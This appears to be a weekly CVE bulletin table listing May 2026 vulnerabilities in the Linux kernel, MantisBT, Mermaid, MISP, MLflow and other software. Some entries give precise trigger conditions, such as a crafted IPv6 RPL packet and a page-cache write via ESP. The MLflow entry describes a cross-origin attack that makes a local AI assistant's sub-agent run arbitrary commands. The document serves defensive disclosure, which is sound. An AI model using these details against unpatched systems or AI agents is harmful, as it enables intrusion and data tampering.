| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_red: Replace direct dequeue call with peek and qdisc_dequeue_peeked When red qdisc has children (eg qfq qdisc) whose peek() callback is qdisc_peek_dequeued(), we could get a kernel panic. When the parent of such qdiscs (eg illustrated in patch #3 as tbf) wants to retrieve an skb from its child (red in this case), it will do the following: 1a. do a peek() - and when sensing there's an skb the child can offer, then - the child in this case(red) calls its child's (qfq) peek. qfq does the right thing and will return the gso_skb queue packet. Note: if there wasnt a gso_skb entry then qfq will store it there. 1b. invoke a dequeue() on the child (red). And herein lies the problem. - red will call the child's dequeue() which will essentially just try to grab something of qfq's queue. [ 78.667668][ T363] KASAN: null-ptr-deref in range [0x0000000000000048-0x000000000000004f] [ 78.667927][ T363] CPU: 1 UID: 0 PID: 363 Comm: ping Not tainted 7.1.0-rc1-00033-g46f74a3f7d57-dirty #790 PREEMPT(full) [ 78.668263][ T363] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 78.668486][ T363] RIP: 0010:qfq_dequeue+0x446/0xc90 [sch_qfq] [ 78.668718][ T363] Code: 54 c0 e8 dd 90 00 f1 48 c7 c7 e0 03 54 c0 48 89 de e8 ce 90 00 f1 48 8d 7b 48 b8 ff ff 37 00 48 89 fa 48 c1 e0 2a 48 c1 ea 03 <80> 3c 02 00 74 05 e8 ef a1 e1 f1 48 8b 7b 48 48 8d 54 24 58 48 8d [ 78.669312][ T363] RSP: 0018:ffff88810de573e0 EFLAGS: 00010216 [ 78.669533][ T363] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 78.669790][ T363] RDX: 0000000000000009 RSI: 0000000000000004 RDI: 0000000000000048 [ 78.670044][ T363] RBP: ffff888110dc4000 R08: ffffffffb1b0885a R09: fffffbfff6ba9078 [ 78.670297][ T363] R10: 0000000000000003 R11: ffff888110e31c80 R12: 0000001880000000 [ 78.670560][ T363] R13: ffff888110dc4150 R14: ffff888110dc42b8 R15: 0000000000000200 [ 78.670814][ T363] FS: 00007f66a8f09c40(0000) GS:ffff888163428000(0000) knlGS:0000000000000000 [ 78.671110][ T363] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 78.671324][ T363] CR2: 000055db4c6a30a8 CR3: 000000010da67000 CR4: 0000000000750ef0 [ 78.671585][ T363] PKRU: 55555554 [ 78.671713][ T363] Call Trace: [ 78.671843][ T363] <TASK> [ 78.671936][ T363] ? __pfx_qfq_dequeue+0x10/0x10 [sch_qfq] [ 78.672148][ T363] ? __pfx__printk+0x10/0x10 [ 78.672322][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672496][ T363] ? lockdep_hardirqs_on_prepare+0xa8/0x1a0 [ 78.672706][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672875][ T363] ? trace_hardirqs_on+0x19/0x1a0 [ 78.673047][ T363] red_dequeue+0x65/0x270 [sch_red] [ 78.673217][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.673385][ T363] tbf_dequeue.cold+0xb0/0x70c [sch_tbf] [ 78.673566][ T363] __qdisc_run+0x169/0x1900 The right thing to do in #1b is to grab the skb off gso_skb queue. This patchset fixes that issue by changing #1b to use qdisc_dequeue_peeked() method instead. | 2026-05-21 | not yet calculated | CVE-2026-43496 | https://git.kernel.org/stable/c/36aa34f42cb6842cf371f3a2d3e855d24fd57a50 https://git.kernel.org/stable/c/ce051eede433f876d322ac3550a36a3c6fc4c231 https://git.kernel.org/stable/c/8d09618840b99ef00154d3e731ce9b11e096196d https://git.kernel.org/stable/c/587dcf970a525f543d8b5855d9f37a4ca97b76ef https://git.kernel.org/stable/c/458d5615272d3de535748342eb68ca492343048c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: udlfb: add vm_ops to dlfb_ops_mmap to prevent use-after-free dlfb_ops_mmap() uses remap_pfn_range() to map vmalloc framebuffer pages to userspace but sets no vm_ops on the VMA. This means the kernel cannot track active mmaps. When dlfb_realloc_framebuffer() replaces the backing buffer via FBIOPUT_VSCREENINFO, existing mmap PTEs are not invalidated. On USB disconnect, dlfb_ops_destroy() calls vfree() on the old pages while userspace PTEs still reference them, resulting in a use-after-free: the process retains read/write access to freed kernel pages. Add vm_operations_struct with open/close callbacks that maintain an atomic mmap_count on struct dlfb_data. In dlfb_realloc_framebuffer(), check mmap_count and return -EBUSY if the buffer is currently mapped, preventing buffer replacement while userspace holds stale PTEs. Tested with PoC using dummy_hcd + raw_gadget USB device emulation. | 2026-05-21 | not yet calculated | CVE-2026-43497 | https://git.kernel.org/stable/c/4f312c30f0368e8d2a76aa650dff73f23490b5e7 https://git.kernel.org/stable/c/18dd358de72d57993422cbb5dfb29ccd74efe192 https://git.kernel.org/stable/c/da9b065cedfd3b574f229d5be594e6aa47a27ae6 https://git.kernel.org/stable/c/a2c53a3822ee26e8d758071815b9ed3bf6669fc1 https://git.kernel.org/stable/c/8de779dc40d35d39fa07387b6f921eb11df0f511 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Disallow re-exporting imported GEM objects Prevent re-exporting of imported GEM buffers by adding a custom prime_handle_to_fd callback that checks if the object is imported and returns -EOPNOTSUPP if so. Re-exporting imported GEM buffers causes loss of buffer flags settings, leading to incorrect device access and data corruption. | 2026-05-21 | not yet calculated | CVE-2026-43498 | https://git.kernel.org/stable/c/3756043dd695bba34cc728cdc5688dcb49ac8043 https://git.kernel.org/stable/c/7dd57d7a6350770dfc283287125c409e995200e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rtmutex: Use waiter::task instead of current in remove_waiter() remove_waiter() is used by the slowlock paths, but it is also used for proxy-lock rollback in rt_mutex_start_proxy_lock() when invoked from futex_requeue(). In the latter case waiter::task is not current, but remove_waiter() operates on current for the dequeue operation. That results in several problems: 1) the rbtree dequeue happens without waiter::task::pi_lock being held 2) the waiter task's pi_blocked_on state is not cleared, which leaves a dangling pointer primed for UAF around. 3) rt_mutex_adjust_prio_chain() operates on the wrong top priority waiter task Use waiter::task instead of current in all related operations in remove_waiter() to cure those problems. [ tglx: Fixup rt_mutex_adjust_prio_chain(), add a comment and amend the changelog ] | 2026-05-21 | not yet calculated | CVE-2026-43499 | https://git.kernel.org/stable/c/8a1fc8d698ac5e5916e3082a0f74450d71f9611f https://git.kernel.org/stable/c/6d52dfcb2a5db86e346cf51f8fcf2071b8085166 https://git.kernel.org/stable/c/3fb7394a837740770f0d6b4b30567e60786a63f2 https://git.kernel.org/stable/c/88614876370aac8ad1050ad785a4c095ba17ac11 https://git.kernel.org/stable/c/3bfdc63936dd4773109b7b8c280c0f3b5ae7d349 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: rpl: reserve mac_len headroom when recompressed SRH grows ipv6_rpl_srh_rcv() decompresses an RFC 6554 Source Routing Header, swaps the next segment into ipv6_hdr->daddr, recompresses, then pulls the old header and pushes the new one plus the IPv6 header back. The recompressed header can be larger than the received one when the swap reduces the common-prefix length the segments share with daddr (CmprI=0, CmprE>0, seg[0][0] != daddr[0] gives the maximum +8 bytes). pskb_expand_head() was gated on segments_left == 0, so on earlier segments the push consumed unchecked headroom. Once skb_push() leaves fewer than skb->mac_len bytes in front of data, skb_mac_header_rebuild()'s call to: skb_set_mac_header(skb, -skb->mac_len); will store (data - head) - mac_len into the u16 mac_header field, which wraps to ~65530, and the following memmove() writes mac_len bytes ~64KiB past skb->head. A single AF_INET6/SOCK_RAW/IPV6_HDRINCL packet over lo with a two segment type-3 SRH (CmprI=0, CmprE=15) reaches headroom 8 after one pass; KASAN reports a 14-byte OOB write in ipv6_rthdr_rcv. Fix this by expanding the head whenever the remaining room is less than the push size plus mac_len, and request that much extra so the rebuilt MAC header fits afterwards. | 2026-05-21 | not yet calculated | CVE-2026-43501 | https://git.kernel.org/stable/c/8e8be63465a5e80394c70324603dfea1bfdad48f https://git.kernel.org/stable/c/4babc2d9fda2df43823b85d08a0180b68f1b0854 https://git.kernel.org/stable/c/c261d07a80576dc8ccf394ef8f074f8c67a06b37 https://git.kernel.org/stable/c/7398ebefbfd4f8a31d4f665a4213302fa995494b https://git.kernel.org/stable/c/9e6bf146b55999a095bb14f73a843942456d1adc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: handle zerocopy send cleanup before the message is queued A zerocopy send can fail after user pages have been pinned but before the message is attached to the sending socket. The purge path currently infers zerocopy state from rm->m_rs, so an unqueued message can be cleaned up as if it owned normal payload pages. However, zerocopy ownership is really determined by the presence of op_mmp_znotifier, regardless of whether the message has reached the socket queue. Capture op_mmp_znotifier up front in rds_message_purge() and use it as the cleanup discriminator. If the message is already associated with a socket, keep the existing completion path. Otherwise, drop the pinned page accounting directly and release the notifier before putting the payload pages. This keeps early send failure cleanup consistent with the zerocopy lifetime rules without changing the normal queued completion path. | 2026-05-21 | not yet calculated | CVE-2026-43502 | https://git.kernel.org/stable/c/21d70744e6d3bbf9293aa1ee6fba7c53ad75275e https://git.kernel.org/stable/c/3abc8983b2bae3f487f77d9da5527d7d6b210d46 https://git.kernel.org/stable/c/14ef6fd18db2494098b21e0471bf27a1d8e9993e https://git.kernel.org/stable/c/0f5c185fc79a59ee9991234dd6d2a3e5afa6e75b https://git.kernel.org/stable/c/44b550d88b267320459d518c0743a241ab2108fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: skbuff: propagate shared-frag marker through frag-transfer helpers Two frag-transfer helpers (__pskb_copy_fclone() and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in skb_shinfo()->flags when moving frags from source to destination. __pskb_copy_fclone() defers the rest of the shinfo metadata to skb_copy_header() after copying frag descriptors, but that helper only carries over gso_{size,segs, type} and never touches skb_shinfo()->flags; skb_shift() moves frag descriptors directly and leaves flags untouched. As a result, the destination skb keeps a reference to the same externally-owned or page-cache-backed pages while reporting skb_has_shared_frag() as false. The mismatch is harmful in any in-place writer that uses skb_has_shared_frag() to decide whether shared pages must be detoured through skb_cow_data(). ESP input is one such writer (esp4.c, esp6.c), and a single nft 'dup to <local>' rule -- or any other nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d skb in esp_input() with the marker stripped, letting an unprivileged user write into the page cache of a root-owned read-only file via authencesn-ESN stray writes. Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors were actually moved from the source. skb_copy() and skb_copy_expand() share skb_copy_header() too but linearize all paged data into freshly allocated head storage and emerge with nr_frags == 0, so skb_has_shared_frag() returns false on its own; they need no change. The same omission exists in skb_gro_receive() and skb_gro_receive_list(). The former moves the incoming skb's frag descriptors into the accumulator's last sub-skb via two paths (a direct frag-move loop and the head_frag + memcpy path); the latter chains the incoming skb whole onto p's frag_list. Downstream skb_segment() reads only skb_shinfo(p)->flags, and skb_segment_list() reuses each sub-skb's shinfo as the nskb -- both p and lp must carry the marker. The same omission also exists in tcp_clone_payload(), which builds an MTU probe skb by moving frag descriptors from skbs on sk_write_queue into a freshly allocated nskb. The helper falls into the same family and warrants the same fix for consistency; no TCP TX-side in-place writer is currently known to reach a user page through this gap, but a future consumer depending on the marker would regress silently. The same omission exists in skb_segment(): the per-iteration flag merge takes only head_skb's flag, and the inner switch that rebinds frag_skb to list_skb on head_skb-frags exhaustion does not fold the new frag_skb's flag into nskb. Fold frag_skb's flag at both sites so segments drawing frags from frag_list members carry the marker. | 2026-05-23 | not yet calculated | CVE-2026-43503 | https://git.kernel.org/stable/c/fbeab9555564a1b98e8582cd106dfe46c4606991 https://git.kernel.org/stable/c/179f1852bdedc300e373e807cc102cd81feff196 https://git.kernel.org/stable/c/12401fcfb01f53ccc63ab0a3246570fe8f3105ee https://git.kernel.org/stable/c/989214c66884d70716d83dc1d0bf5e16287bf349 https://git.kernel.org/stable/c/fc6eb39c55e97df2f94ad974b8a5bbcd019da2c8 https://git.kernel.org/stable/c/ff375cc75f9167168db38e0464a482d5fbc8d81d https://git.kernel.org/stable/c/9bc9d6d6967a2239aa57af2aa53554eddd640d20 https://git.kernel.org/stable/c/48f6a5356a33dd78e7144ae1faef95ffc990aae0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: skbuff: preserve shared-frag marker during coalescing skb_try_coalesce() can attach paged frags from @from to @to. If @from has SKBFL_SHARED_FRAG set, the resulting @to skb can contain the same externally-owned or page-cache-backed frags, but the shared-frag marker is currently lost. That breaks the invariant relied on by later in-place writers. In particular, ESP input checks skb_has_shared_frag() before deciding whether an uncloned nonlinear skb can skip skb_cow_data(). If TCP receive coalescing has moved shared frags into an unmarked skb, ESP can see skb_has_shared_frag() as false and decrypt in place over page-cache backed frags. Propagate SKBFL_SHARED_FRAG when skb_try_coalesce() transfers paged frags. The tailroom copy path does not need the marker because it copies bytes into @to's linear data rather than transferring frag descriptors. | 2026-05-23 | not yet calculated | CVE-2026-46300 | https://git.kernel.org/stable/c/3599e6b3cc1ada96883d496a50a210d3afbb6987 https://git.kernel.org/stable/c/2f2b16022a2e10ca7bccfb98db5ed2ec0f72641c https://git.kernel.org/stable/c/9d3e5fd19fe1063bf607219e8562fbd567b8e8d5 https://git.kernel.org/stable/c/78bf6b6bb19541d19fbda6242e7cfe2c682763c0 https://git.kernel.org/stable/c/760e1addc27ba1a7beb4a0a7e8b3e9ec49e7a34e https://git.kernel.org/stable/c/3bd9e113d50034db99d7ef69fd8e5242d15e414a https://git.kernel.org/stable/c/3884358a9286b17f389a72b1426fc4547c23c111 https://git.kernel.org/stable/c/f84eca5817390257cef78013d0112481c503b4a3 |
| LiteSpeed Technologies--cPanel Plugin | LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild in May 2026. Detection is best done via a command line of grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null in Bash. If you get no output, you have not been hit with exploitation of the vulnerability. If there is output, we recommend you examine the IP addresses in the list, determine if they are valid IP addresses, and if not, block them. To determine damage done, examine the system logs for use by the detected IP addresses. The issue is related to mishandling of Redis enable/disable features. The recommended minimum version is 2.4.7. | 2026-05-21 | not yet calculated | CVE-2026-48172 | https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log https://blog.litespeedtech.com/2026/05/21/security-update-for-litespeed-cpanel-plugin/ |
| lostisland--faraday | Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3. | 2026-05-19 | not yet calculated | CVE-2026-33637 | https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484 https://github.com/advisories/GHSA-33mh-2634-fwr2 |
| LXQt--PCManFM-Qt | An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file's path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O. | 2026-05-22 | not yet calculated | CVE-2026-48700 | https://www.openwall.com/lists/oss-security/2026/05/20/2 https://www.openwall.com/lists/oss-security/2026/05/19/1 https://github.com/lxqt/pcmanfm-qt/releases |
| M-Files Corporation--M-Files Server | Denial-of-service condition in M-Files Server versions before 26.5.16015.0, before 26.2 LTS, and before 25.8 LTS SR3 allows an authenticated user to cause the MFserver process to crash | 2026-05-18 | not yet calculated | CVE-2026-0983 | https://empower.m-files.com/security-advisories/CVE-2026-0983 |
| mailcow--mailcow-dockerized | mailcow-dockerized contains a stored cross-site scripting vulnerability in the administrator Queue Manager. The Queue Manager fetches mail queue entries from /api/v1/get/mailq/all, copies server-controlled Postfix queue fields into DataTables rows, and renders several of those fields as HTML without adequate output encoding. This issue affects mailcow-dockerized: 2026-03b. | 2026-05-20 | not yet calculated | CVE-2026-7460 | https://fluidattacks.com/advisories/mojabi https://github.com/mailcow/mailcow-dockerized |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.0 and 2.28.1 allow a low-privileged authenticated user assigned the "add_profile_threshold" permission to create a global profile despite not having manage_global_profile_threshold, by tampering with the user_id parameter in a valid profile creation request. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-33052 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-68w5-w573-q2r8 https://github.com/mantisbt/mantisbt/commit/3f952e68fa864e0e60abc3e84adecf3cfa84c75e https://mantisbt.org/bugs/view.php?id=36974 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior have a Privilege Escalation vulnerability where insufficient access control checks in ProjectUsersAddCommand (manage_proj_user_add.php) allow users having manage_project_threshold access level (manager by default) to grant project-level administrator access to any user (including themselves) in any Project they have manager rights in. The normal project-user add form restricts the selectable access levels to the actor's own project role or below. However, the backend handler still accepts a forged higher access_level value and writes it. The consequences of the privilege escalation are slight, as having administrator access at Project level is effectively not very different from being manager, and it does not actually give administrator privileges on the whole MantisBT instance. In particular, it does not let the upgraded user delete the Project or grant them any access to global administrative functions such as managing Users, Projects, Plugins, Custom Fields, etc. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34390 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-frf7-jhp9-jxm6 https://github.com/mantisbt/mantisbt/commit/69e0180f180ed5acf48a8d281a73683a7bf32461 https://mantisbt.org/bugs/view.php?id=36995 https://mantisbt.org/bugs/view.php?id=37002 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior contain a Stored XSS vulnerability. When cloning an issue originating from a Project other than the current one, the clone form (bug_report_page.php) prepends the source Project name before the category selector without proper escaping, allowing an attacker able to to inject HTML if they can set the Project's name (which typically requires manager or administrator access level). This issue has been resolved in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34463 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-fvjf-68wh-rwp2 https://github.com/mantisbt/mantisbt/commit/df22697ae497ddd93f3d9132fdf4979db8d081cd https://mantisbt.org/bugs/view.php?id=36986 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior are vulnerable to Authorization Bypass through the private issue monitoring feature . Using a crafted POST request to bug_monitor_add.php, a user with project-level access can add themselves as a monitor for a private issue they do not have access to. Despite displaying an Access Denied error, the application accepts the request and creates a monitor relationship for the private issue. Direct access to the private issue remains blocked, but the user will receive email notifications for updates, leading to disclosure of the private issue's metadata and content. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34579 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-ggw7-9675-6v4v https://github.com/mantisbt/mantisbt/commit/0a93267deba445fb9d15250c16e6fdb1246ffa65 https://mantisbt.org/bugs/view.php?id=36975 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior permit a user to list and download their own attachments from an Issue created by another user even after it becomes private, bypassing read access revocation. The loss of confidentiality caused by this vulnerability is minimal, considering that only attachments previously uploaded by the user themselves remain accessible. This issue has been fixed in version 2.82.2. | 2026-05-19 | not yet calculated | CVE-2026-34744 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-rmp5-5jj7-gmvf https://github.com/mantisbt/mantisbt/commit/de7bdeec36de066235e38a77bf056917d951c84d https://mantisbt.org/bugs/view.php?id=36977 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow a bugnote author to access the note's Revisions page after losing access to the parent private issue. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34970 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-crmx-4p49-46m2 https://github.com/mantisbt/mantisbt/commit/71df1f67e05b2050cd4bd87839e6cc13747cf03f https://mantisbt.org/bugs/view.php?id=36978 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.11.0 through 2.28.1 allow any authenticated user to inject arbitrary HTML by updating their account's font family. Upon exploitation, an XSS payload would be reflected on every MantisBT page. Leveraging another vulnerability (CSP bypass, see GHSA-9c3j-xm6v-j7j3), the attacker could achieve account takeover. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40596 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j3v9-553h-x28j https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/9e8409cdd979eba86ef532756fc47c1d8112d22d https://mantisbt.org/bugs/view.php?id=37011 https://mantisbt.org/bugs/view.php?id=37016 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy's script-src directive by uploading a crafted attachment to any issue that, when accessed via the file_download.php link, will be downloaded with a valid JavaScript MIME type resulting in script execution. The uploaded payload must be sniffed as a valid JavaScript MIME type by PHP finfo (see file_create_finfo() API function). Non-JavaScript MIME types will not get imported in a <script> tag by the browser, due to response header X-Content-Type-Options being set to nosniff, which requires all imported JavaScript files to be a valid JavaScript MIME type. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40597 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/9e3bee2e7b909f4e3596985892b8bc8bee9e0bfe https://mantisbt.org/bugs/view.php?id=37016 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, improper escaping of the redirection page (retrieved from the request's Referer header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40598 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-6jh4-47v2-4g37 https://github.com/mantisbt/mantisbt/commit/b1ebc57763f104eb5f541b7b4d1ce6948168abd9 https://mantisbt.org/bugs/view.php?id=37017 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.11.0 through 2.28.1, a Stored XSS vulnerability is caused by incorrect escaping of a saved filter's owner, allowing an attacker to inject arbitrary HTML on systems where $g_show_user_realname = ON. Note that By default, only users with Manager access level or above can save their filters publicly. This issue has been fixed in version 2.28.2. If developers are unable to update immediately, they can work around this issue by preventing display of users' real names (set $g_ show_user_realname = OFF; in configuration), and restricting the ability to store filters (set $g_stored_query_create_threshold / $g_stored_query_create_shared_threshold to NOBODY). | 2026-05-22 | not yet calculated | CVE-2026-40607 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-f633-865q-2mhh https://github.com/mantisbt/mantisbt/commit/44f490bcf20fd491c1b8f3fc9dd041d8c2a30010 https://mantisbt.org/bugs/view.php?id=37015 |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and prior, in addition to 11.0.0-alpha.1 through 11.12.0 are vulnerable to CSS injection through improper sanitization. The state diagram (and any other diagram type that routes user-controlled style strings through the createCssStyles parser) captures classDef values using an unrestricted regex that matches everything up to a newline. That value then flows unsanitized through addStyleClass() into createCssStyles() and is assigned to style.innerHTML, so a closing brace (}) in the value terminates the generated CSS selector and turns everything after it into a new CSS rule on the page. This enables page defacement, user tracking via url() callbacks, and DOM attribute exfiltration. This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting "securityLevel": "sandbox", which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. | 2026-05-22 | not yet calculated | CVE-2026-41148 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102 https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 https://mermaid.js.org/config/schema-docs/config.html#securitylevel |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and earlier, as well as 11.0.0-alpha.1 through 11.14.0, are vulnerable to HTML injection under the default configuration. Specifically, the classDef directive in Mermaid state diagrams permits DOM injection that escapes the SVG context. However, <script> tags are stripped, which prevents cross-site scripting (XSS). This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting "securityLevel": "sandbox", which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. | 2026-05-22 | not yet calculated | CVE-2026-41149 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056 https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3 |
| misp--misp | MISP's OIDC authentication plugin allowed automatic linking of an OIDC identity to an existing local user account based on the email claim when the local account had no stored sub value. Under insecure or untrusted IdP configurations where email ownership is not enforced, an attacker with a valid OIDC token could assert a victim's email address and authenticate as that user, leading to account takeover. | 2026-05-20 | not yet calculated | CVE-2026-9084 | https://github.com/MISP/MISP/commit/71f5662c1b5886613d2cd5c72fd93bb4ca6fa172 |
| misp--misp | A vulnerability was identified in the ShadowAttribute proposal creation workflow. The add action accepted user-controlled ShadowAttribute request data without removing the id field before saving the record. Because the underlying framework treats a supplied primary key as an instruction to update an existing record, an authenticated user able to submit shadow attribute proposals could provide the identifier of an existing ShadowAttribute and cause that record to be updated instead of creating a new proposal. This can result in unauthorized modification of existing shadow attributes, potentially affecting proposals associated with events the user should not be able to alter. Depending on deployment configuration and accessible API responses, the issue may also expose or move proposal data across event contexts. The vulnerability is caused by trusting a client-supplied primary key during object creation. The fix removes the id field from incoming ShadowAttribute data before processing, ensuring that the endpoint always creates a new proposal rather than updating an existing one. This has been fixed in MISP 2.5.38. | 2026-05-20 | not yet calculated | CVE-2026-9136 | https://github.com/MISP/MISP/commit/49911b1d4b6e4517d803e50e3d980aaa4d37c16d |
| misp--misp | The CSP report endpoint intended to limit logged CSP reports to 1 KB but incorrectly allowed reports up to 1 MB before truncation. On deployments where the endpoint is reachable by untrusted clients, this could allow attackers to generate excessive log volume and contribute to resource exhaustion or log flooding. | 2026-05-20 | not yet calculated | CVE-2026-9137 | https://github.com/MISP/MISP/commit/02932cccab230b295afcaf5aa05e363d30db0ec9 |
| mlflow--mlflow/mlflow | In MLflow version 3.9.0, the MLflow Assistant feature introduced improper origin validation in its /ajax-api endpoints. This vulnerability allows a remote attacker to exploit cross-origin requests from a malicious webpage to interact with the MLflow Assistant running on a victim's local machine. By bypassing the loopback-only restriction, the attacker can modify the Assistant's configuration to enable full access, which in turn allows the execution of arbitrary commands via the Claude Code sub-agent. This issue is resolved in version 3.10.0. | 2026-05-19 | not yet calculated | CVE-2026-2611 | https://huntr.com/bounties/8462addd-b464-4a84-b6a2-5529604e6e5a https://github.com/mlflow/mlflow/commit/8f9c8a53af90842944101eb8b7d60706822c81bc |
| mlflow--mlflow/mlflow | In mlflow/mlflow versions up to 3.9.0, the `SearchModelVersions` REST API endpoint and the `mlflowSearchModelVersions` GraphQL query lack proper per-model authorization checks when basic authentication is enabled. This allows any authenticated user to enumerate all model versions across all registered models, regardless of their permission level. The issue arises due to the absence of `SearchModelVersions` in the `BEFORE_REQUEST_VALIDATORS` and `AFTER_REQUEST_HANDLERS` for the REST API, and its omission from `GraphQLAuthorizationMiddleware.PROTECTED_FIELDS` for GraphQL. This vulnerability can expose sensitive information such as model names, version descriptions, source URIs, tags, and other metadata, potentially revealing proprietary or confidential details in multi-tenant environments. The issue is resolved in version 3.10.0. | 2026-05-21 | not yet calculated | CVE-2026-2734 | https://huntr.com/bounties/d632f783-b2c7-4a3b-af5e-1d693e841c08 https://github.com/mlflow/mlflow/commit/6989066af33fdcb03588fd71a1a67f8fc5ef12c9 |
| mlflow--mlflow/mlflow | In mlflow/mlflow versions prior to 3.11.0, the `get_or_create_nfs_tmp_dir()` function in `mlflow/utils/file_utils.py` creates temporary directories with world-writable permissions (0o777), and the `_create_model_downloading_tmp_dir()` function in `mlflow/pyfunc/__init__.py` creates directories with group-writable permissions (0o770). These insecure permissions allow local attackers to tamper with model artifacts, such as cloudpickle-serialized Python objects, and achieve arbitrary code execution when the tampered artifacts are deserialized via `cloudpickle.load()`. This vulnerability is particularly critical in environments with shared NFS mounts, such as Databricks, where NFS is enabled by default. The issue is a continuation of the vulnerability class addressed in CVE-2025-10279, which was only partially fixed. | 2026-05-18 | not yet calculated | CVE-2026-4137 | https://huntr.com/bounties/648dc30b-76c7-4433-86b8-f43d926fd8d6 https://github.com/mlflow/mlflow/commit/1dcbb0c2fbd1f446c328830e601ca13a28219b8a |
